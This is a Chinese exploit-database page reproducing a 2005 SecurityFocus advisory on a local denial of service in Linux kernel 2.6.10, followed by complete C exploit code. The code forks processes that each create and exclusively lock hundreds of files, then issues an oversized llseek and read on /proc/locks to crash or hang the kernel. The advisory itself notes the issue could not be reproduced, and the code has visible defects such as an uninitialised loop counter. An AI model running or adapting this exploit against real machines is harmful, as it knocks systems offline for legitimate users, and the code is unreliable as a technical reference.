Linux Kernel 2.6.10 – File Lock Local Denial of Service
漏洞ID | 1054989 | 漏洞类型 | |
发布时间 | 2005-03-30 | 更新时间 | 2005-03-30 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/12949/info
A local denial of service vulnerability reportedly affects the Linux kernel. This issue arises due to a failure of the kernel to properly handle malicious, excessive file locks.
An attacker may leverage this issue to crash or hang the affected kernel and deny service to legitimate users.
It should be noted that Symantec has been unable to reproduce this issue after testing. It is possible that this vulnerability is linked to the reporter's specific configuration. More information will be added as it becomes available.
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <linux/unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/file.h>
#include <syscall.h>
#include <errno.h>
#define SIZE 0x80004242
_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res, uint, wh);
void createfile(){
int nm1, filev;
char vname[424];
for(nm1=0;nm1<920;nm1++){
snprintf(vname, sizeof(vname), "UNLOCKRESEARCHTEAM%d.%d", getpid(), nm1);
filev = open(vname, O_CREAT|O_RDWR, S_IRWXU);
if(filev < 0){
printf("ERRORn");
perror("open()");
}
if(flock(filev,LOCK_EX) == -1){
printf("ERRORn");
perror("flock()");
}
}
while(42);
}
int main(int argc, char *argv[]){
int count, fd, i, fv;
void *mv;
char *buf1, *buf2;
loff_t lr;
int nm1;
printf("ttkernel-2.6.10 DoS by ChoiX [Unl0ck Team]n");
printf("[--]create files(it can take a few minutes)...");
nm1 = 5;
while(count--){
if(!fork()){
createfile();
}
}
sleep(100);
printf("OKn");
printf("[--]start exploiting...");
system("sync");
fd=open("/proc/locks", O_RDONLY);
if(fd < 0){
printf("ERRORn");
perror("open()");
}
buf1 = malloc(1024*1024*8);
buf2 = malloc(1024*1024*8);
if(_llseek(fd,42,SIZE,&lr,SEEK_SET) == -1){
printf("ERRORn");
printf("llseek()");
}
i=read(fd,buf2, SIZE);
perror("read");
printf("read=%d mv=%x fv=%xn %.300s",i,(int)mv,fv,buf2);
while(42);
return 42;
}
相关推荐: Cerulean Studios Trillian Client MSN Module Remote Buffer Overflow Vulnerability
Cerulean Studios Trillian Client MSN Module Remote Buffer Overflow Vulnerability 漏洞ID 1097967 漏洞类型 Boundary Condition Error 发布时间 2…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666